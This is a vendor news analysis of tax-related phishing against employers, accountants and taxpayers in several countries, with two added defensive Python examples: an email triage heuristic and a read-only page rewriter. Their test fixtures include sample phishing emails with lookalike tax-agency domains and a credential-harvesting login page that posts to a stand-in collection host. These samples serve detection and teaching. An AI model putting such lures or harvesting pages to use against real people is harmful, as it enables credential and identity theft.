

Jay Kelley
News Analysis-Security Now

Nothing's Certain, Except Death, Taxes... & Phishing

Recent phishing attacks could mean that a tax bill is the least of your government revenue issues.

"But in this world, nothing can be said to be certain, except death and taxes." – Benjamin Franklin

Many businesses and their employees recently fell victim to a very successful spear-phishing attack. An email that appeared to come from a company executive asked an unsuspecting employee to send the company's W-2s to deal with a "financial emergency." The email was a spear-phishing attack, and all of the employees' W-2s went directly to the attacker or attackers, who now hold the names, addresses, Social Security Numbers (SSNs), wages and tax information of every employee at the company: a treasure trove of information that could lead to false tax claims, identity theft and other financial catastrophes.

But the IRS began warning accountants and tax professionals in January that they, too, were under attack by hackers, and with not just one scam but at least two.

In the first scam, an accountant or tax professional received an email from a prospective client -- really the attacker -- stating that they were looking to hire someone to prepare their personal or business taxes. The attacker might use the name of a friend or associate, who has also been hacked, as a reference in their email, to avoid suspicion and ease the mind of the accountant or tax professional.

The attacker would include a link to a website, or an Adobe Acrobat or other file attachment with an embedded link, claiming that the link led to their financial information. Once the accountant or tax pro clicked the link, the website would pilfer the accountant's or tax pro's email address, user name, password and likely much more.

With the stolen email address and credentials, the attackers begin the cycle all over again, sending another phishing email to the clients of the accountant or tax professional they initially compromised. The clients are asked to click on a link in the email or on an attachment and re-enter their financial information, or their user name and password for the compromised accountant's or tax pro's online software or website. When a client falls for this phishing attack, their information is stolen, and their tax refund will likely end up being claimed by the attacker.

A second phishing attack forced the Internal Revenue Service to send another alert to accountants and tax professionals. In this attack, the attackers sent an email to an accountant or tax professional claiming that they had been locked out of their tax preparation software due to "security issues."

Under tight deadlines and tremendous pressure, this is the last thing the accountant or tax professional needed to see! The phishing email included a link that would supposedly unlock the software. Desperate to make sure their tax preparation software was secure and accessible, the accountant or tax professional would click on the link with no questions asked and no suspicion.

Unfortunately, the link led to a phishing website requesting the accountant's or tax professional's user name and password for the tax preparation software, so that the software could be unlocked. Upon entering their user name and password, the attacker would have all the information needed to break into the tax preparation software and steal the financial and tax information for all the accountant's or tax pro's clients!

Of course, tax phishing scams are not limited to the United States. In Canada, for instance, attackers have been sending phishing emails posing as the Canada Revenue Agency (CRA), informing the recipient that, due to a recalculation of the prior year's taxes, they are due a refund or a larger refund than expected. The link in the email leads to a bogus website where the user is asked to re-enter their personal and financial data, including, in some cases, their user name and password, and to answer security questions such as their mother's maiden name. The attackers then use this data to intercept the user's tax refund, get into their finances and bank accounts, and rob them.

In Australia, attackers pose as the Australian Tax Office (ATO), sending the unsuspecting recipient an email that appears to give access to their next Online Activity Statement, or that claims they are due a refund or an additional amount on their refund, that they owe additional taxes, or that they must reconfirm or update their tax file number. If the user clicks on the link in the email and provides their personal and financial information, their accounts are pillaged and their personal information is quickly posted for sale on the Dark Web.

The United Kingdom is not immune to these phishing attacks, either. The phishers send unsuspecting users a "tax refund notification" email, posing as Her Majesty's Revenue & Customs (HMRC), with a link to a false webpage so that they may enter their banking information, so that their phony "tax refund" may be deposited for them automatically. Only the poor user doesn't get a tax refund but, instead, loses their hard-earned money to the unscrupulous phishing attacker.

I personally received a spear-phishing email several years ago claiming to be from the IRS and signed by a supposed IRS agent; it had several misspellings and grammatical errors, as well as an outdated IRS logo on its "official" letterhead. I was also "vished" by several calls and "smished" by a few SMS texts from the "Internal Revenue System" to my cellphone, all from a Washington, DC area code (202) and with a caller ID of "I.R.S.," and all threatening me with arrest if I did not provide a credit card number to pay my supposed back taxes. It quickly becomes clear that someone who is not in or familiar with cybersecurity could easily be fooled by such threatening emails, calls and texts, and feel pressured to immediately turn over their personal or financial information.

So, what can be done to halt these attacks on accountants and tax professionals, and, ultimately, you and your organization's tax and financial data?

The IRS, and tax agencies in other countries, try to emphasize to taxpayers that they will not typically initiate contact by email or text message to request personal or financial information. Taxpayers and tax professionals alike should never open an attachment or click a link from an unknown or suspicious source, and should be wary of messages with misspellings and awkward grammar. Still, stronger, fail-safe measures are needed to protect tax professionals and taxpayers.
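The advice above (agencies do not initiate contact by email, be suspicious of links and lures) can be turned into a triage rule. The following is an added example written for this page, not code from the article or from any vendor: it checks whether a message that invokes one of the agencies named here (IRS, CRA, ATO, HMRC) actually comes from, and links to, that agency's domain, and whether a credential lure ("locked out", "refund", "re-enter") points off the sender's own domain. The agency domain allowlist, the brand and lure patterns, and the three sample messages are all assumptions constructed for the demonstration.

```python
"""Heuristic triage of tax-agency phishing lures.

Added example, not code from the article or from any vendor. The agency domain
allowlist, the brand and lure patterns and the sample messages are assumptions
constructed for this demonstration.
"""
import re
from email import message_from_string
from email.message import Message
from urllib.parse import urlparse

# Assumed allowlist: the brands the lures impersonate and the domain each agency uses.
AGENCY_DOMAINS = {
    "irs": {"irs.gov"},
    "cra": {"canada.ca"},
    "ato": {"ato.gov.au"},
    "hmrc": {"gov.uk"},
}
BRAND_PATTERNS = {
    "irs": re.compile(r"\b(irs|internal revenue)\b", re.I),
    "cra": re.compile(r"\b(cra|canada revenue)\b", re.I),
    "ato": re.compile(r"\b(ato|australian tax(ation)? office)\b", re.I),
    "hmrc": re.compile(r"\b(hmrc|revenue\s*&?\s*customs)\b", re.I),
}
# Phrases the lures described on this page lean on: lockouts, refunds, re-entering credentials.
LURE_WORDS = re.compile(r"locked out|re-?enter|verify your account|password|refund|tax file number", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)


def host_matches(host: str, domain: str) -> bool:
    """True only if host is the domain itself or a subdomain of it; lookalikes
    such as irs.gov.refund-portal.net or irs-gov-refund.com do not match."""
    host, domain = host.lower(), domain.lower()
    return host == domain or host.endswith("." + domain)


def sender_domain(msg: Message) -> str:
    m = re.search(r"@([\w.-]+)", msg.get("From", ""))
    return m.group(1).lower() if m else ""


def link_hosts(body: str) -> list[str]:
    return [urlparse(u).hostname or "" for u in URL_RE.findall(body)]


def triage(raw: str) -> list[str]:
    """Return the reasons a (single-part, text) message looks like a tax phishing lure."""
    msg = message_from_string(raw)
    body = msg.get_payload()
    text = " ".join([msg.get("From", ""), msg.get("Subject", ""), body])
    sender = sender_domain(msg)
    hosts = link_hosts(body)
    reasons = []
    for brand, pattern in BRAND_PATTERNS.items():
        if not pattern.search(text):
            continue
        allowed = AGENCY_DOMAINS[brand]
        if not any(host_matches(sender, d) for d in allowed):
            reasons.append(f"claims to be {brand.upper()} but sender domain is {sender or 'missing'}")
        for h in hosts:
            if not any(host_matches(h, d) for d in allowed):
                reasons.append(f"{brand.upper()} lure links to {h}")
    if LURE_WORDS.search(text):
        for h in hosts:
            if not host_matches(h, sender):
                reasons.append(f"credential lure links off the sender's domain to {h}")
    return reasons


# Constructed samples modelled on the lures described in the article.
SAMPLE_REFUND = """From: "Internal Revenue Service" <refunds@irs-gov-refund.com>
Subject: Tax refund notification

Our records show you are due a refund after a recalculation of last year's return.
Confirm your bank details at http://irs.gov.refund-portal.net/verify within 48 hours.
"""
SAMPLE_LOCKOUT = """From: "TaxPro Support" <support@taxsoftware.example>
Subject: You have been locked out of your tax preparation software

Due to security issues your account is locked. Unlock it at
http://taxsoftware.example.login-unlock.ru/unlock before the filing deadline.
"""
SAMPLE_BENIGN = """From: "Dana" <dana@example.com>
Subject: Lunch next week?

Are you free on Tuesday? Reply when you can.
"""

if __name__ == "__main__":
    for name, raw in [("refund", SAMPLE_REFUND), ("lockout", SAMPLE_LOCKOUT), ("benign", SAMPLE_BENIGN)]:
        print(name, "->", triage(raw) or "clean")
```

The suffix check in host_matches is the part worth copying: a plain substring test would accept irs.gov.refund-portal.net, which is exactly the kind of hostname these lures use. In production the allowlist would come from a public-suffix-aware list rather than this hand-written one.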

Existing email security software may catch some of these phishing attacks, but, going by the vendors' own capture statistics, it is unlikely to catch the more sophisticated ones. And it takes only a single successful phishing attack to expose the tax, financial and even personal information of every client an accountant or tax professional has, ruining their reputation and possibly destroying a business that took years to build.

The surest way to stop email-based phishing attacks before they can do damage is isolation.

Isolating all web access ensures that email-based phishing attacks that need the user to click on a link will not succeed. Once the user clicks the link in the phishing email or attachment, the request goes to the isolation platform, which loads and executes the web page remotely, proxies it, and returns only a safe, clean, malware-free rendering to the user's browser. Some isolation platforms can even prevent credential theft by rendering untrusted websites in read-only mode, so users cannot enter their name, password or any other sensitive information into a web form. Note that isolation addresses link-based lures; the W-2 request described at the start of this article, which asked the employee to email the documents directly, has to be stopped by process controls such as verifying the request out of band.
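To make the read-only mode described above concrete, here is an added example, written for this page and not code from Menlo Security or any other isolation product. It shows what an isolation proxy can do to a fetched page before handing it to the browser: drop scripts and frames, strip inline event handlers, turn every form into an inert container and disable every input, so a phishing login form has nothing to collect and nowhere to send it. The rewriting rules, the tag sets and the sample phishing page are assumptions constructed for the demonstration.

```python
"""Read-only rendering of a proxied page, the way an isolation platform's
read-only mode neutralises a phishing form.

Added example, not code from the article or any vendor. The tag sets, the
rewriting rules and the sample page are constructed for this demonstration.
"""
from html.parser import HTMLParser

DROPPED = {"script", "iframe", "object", "embed"}      # active content never reaches the browser
FIELDS = {"input", "textarea", "select", "button"}     # can neither accept nor send data
VOID = {"input", "br", "img", "meta", "link", "hr"}    # emitted without a closing tag


def _esc(value: str) -> str:
    return value.replace("&", "&amp;").replace('"', "&quot;")


class ReadOnlyRewriter(HTMLParser):
    """Re-emit HTML with active content removed and every form made inert."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []
        self.skip = 0          # nesting depth inside a dropped element
        self.stats = {"dropped": 0, "forms": 0, "fields": 0, "handlers": 0}

    def _attrs(self, tag, attrs):
        kept = []
        for k, v in attrs:
            if k.startswith("on"):                    # inline event handlers (onsubmit, onclick, ...)
                self.stats["handlers"] += 1
                continue
            if tag == "form" and k in {"action", "method", "target"}:
                continue                              # nowhere left to post to
            kept.append((k, v))
        if tag in FIELDS and not any(k == "disabled" for k, _ in kept):
            kept.append(("disabled", None))           # browser refuses input and never submits it
            self.stats["fields"] += 1
        return "".join(f" {k}" if v is None else f' {k}="{_esc(v)}"' for k, v in kept)

    def handle_starttag(self, tag, attrs):
        if tag in DROPPED:
            self.skip += 1
            if self.skip == 1:
                self.stats["dropped"] += 1
            return
        if self.skip:
            return
        rendered = self._attrs(tag, attrs)
        if tag == "form":                             # a div cannot be submitted, even by pressing Enter
            self.stats["forms"] += 1
            self.out.append(f"<div data-isolated-form{rendered}>")
        else:
            self.out.append(f"<{tag}{rendered}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)              # void tags need no close

    def handle_endtag(self, tag):
        if tag in DROPPED:
            self.skip = max(self.skip - 1, 0)
            return
        if self.skip or tag in VOID:
            return
        self.out.append("</div>" if tag == "form" else f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(data)

    def handle_entityref(self, name):
        if not self.skip:
            self.out.append(f"&{name};")

    def handle_charref(self, name):
        if not self.skip:
            self.out.append(f"&#{name};")

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")


def render_read_only(html: str):
    """Return (rewritten page, counts of what was neutralised)."""
    parser = ReadOnlyRewriter()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.stats


# Constructed sample: a "software lockout" credential-harvesting page.
SAMPLE_PHISH = """<!DOCTYPE html><html><head><title>Unlock your tax software</title>
<script>document.cookie="tracked=1";</script></head>
<body onload="beacon()"><h1>Account locked for security reasons</h1>
<form action="https://unlock-taxsoftware.example/collect" method="post" onsubmit="steal()">
<input name="user" placeholder="User name">
<input name="pass" type="password">
<button type="submit" onclick="go()">Unlock</button>
</form><iframe src="https://unlock-taxsoftware.example/track"></iframe>
<p>Questions? &copy; TaxSoft</p></body></html>"""

if __name__ == "__main__":
    page, stats = render_read_only(SAMPLE_PHISH)
    print(stats)
    print(page)
```

The page the user sees still looks like the lure, which is what you want for a read-only preview, but the password field is disabled, the form has no action and nothing runs in the browser. A real platform renders the page remotely and streams pixels or a sanitised DOM rather than rewriting HTML like this, but the policy it enforces on a form is the same.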

So, if you have deployed isolation for the accountant or tax professional you support, you can be assured that link-based phishing attacks targeting their sensitive financial data and their customers' tax information will be stopped cold, protecting their customers' financial security and the reputation and integrity of their business. But if you haven't, you might want to do at least an informal security audit before you have them file your taxes.

Jay Kelley is Senior Product Marketing Manager for Menlo Security. Jay also co-authored the book Network Access Control for Dummies published by John Wiley & Sons in 2009.
